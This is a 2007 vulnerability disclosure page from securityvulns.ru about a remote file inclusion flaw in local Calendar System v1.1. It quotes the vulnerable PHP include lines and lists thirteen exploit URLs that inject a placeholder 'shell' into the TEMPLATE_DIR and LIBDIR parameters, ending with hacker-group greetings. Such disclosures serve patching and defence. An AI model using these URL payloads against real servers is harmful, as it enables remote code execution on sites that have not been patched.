Computer Security

Security Advisory: local Calendar System v1.1 (lcStdLib.inc) Remote File Include
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Open Conference Systems = 2.8.2 Remote File Inclusion

  AdMentor (banners) admin SQL injection

  Full Disclosure:  Arbitrary Code Execution in LedgerSMB CVE-2006-5872

  FdScript <= v1.3.2 Remote File Disclosure Vulnerability

From:trzindan_(at)_hotmail.fr <trzindan_(at)_hotmail.fr>
Date:28.01.2007
Subject:local Calendar System v1.1 (lcStdLib.inc) Remote File Include

+--------------------------------------------------------------------------------
-----------
local Calendar System v1.1 (lcStdLib.inc) Remote File Include

Tr_ZiNDaN

trzindan@hotmail.fr Turkey
---------------------------------------------------------------------------------
-----------
download : ftp://ftp.loci.wisc.edu/locisoftware/LoCal/LoCal-1.1.tar.gz
---------------------------------------------------------------------------------
-----------

code :
require "$TEMPLATE_DIR/header.inc";
require("$LIBDIR/lcStdLib.inc");
require("$LIBDIR/lcUser.php");
require ("$LIBDIR/lcGroup.inc");
require("$LIBDIR/lcCal.inc");
require("$LIBDIR/Calendar.inc");
require("$LIBDIR/lcErrorChecker.inc");
include ("$TEMPLATE_DIR/navbar.php");
include("$TEMPLATE_DIR/footer.inc");
---------------------------------------------------------------------------------
-----------
exploit:

local/showinvoices.php?TEMPLATE_DIR=shell?
local/editevent.php?LIBDIR=shell?
local/resetpassword.php?LIBDIR=shell?
local/signup.php?LIBDIR=shell?
local/showmonth.php?TEMPLATE_DIR=shell?
local/showmonth.php?LIBDIR=shell?
local/showday.php?LIBDIR=shell?
local/showevents.php?LIBDIR=shell?
local/showevents.php?TEMPLATE_DIR=shell?
local/retrieveinvoice.php?TEMPLATE_DIR=shell?
local/modifyitem.php?TEMPLATE_DIR=shell?
local/lookup_userid.php?LIBDIR=shell?
local/lookup_userid.php?TEMPLATE_DIR=shell?

--------------------------------------------------------------------------
Thanx

str0ke,EL_MuHaMMeD,Crackers_Child,H0tturk,EntriKa,XYU,E-system,RedWorm
Blackwolf,Mefisto,M3rhametsiz,Paradox_,Sehzade,Volqan,Arslan,KurtEfendy..


-------------------------------------------------------------------------

##---ALL MusLim
Hackers--------------------------------------------------------------------------
----------------------

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server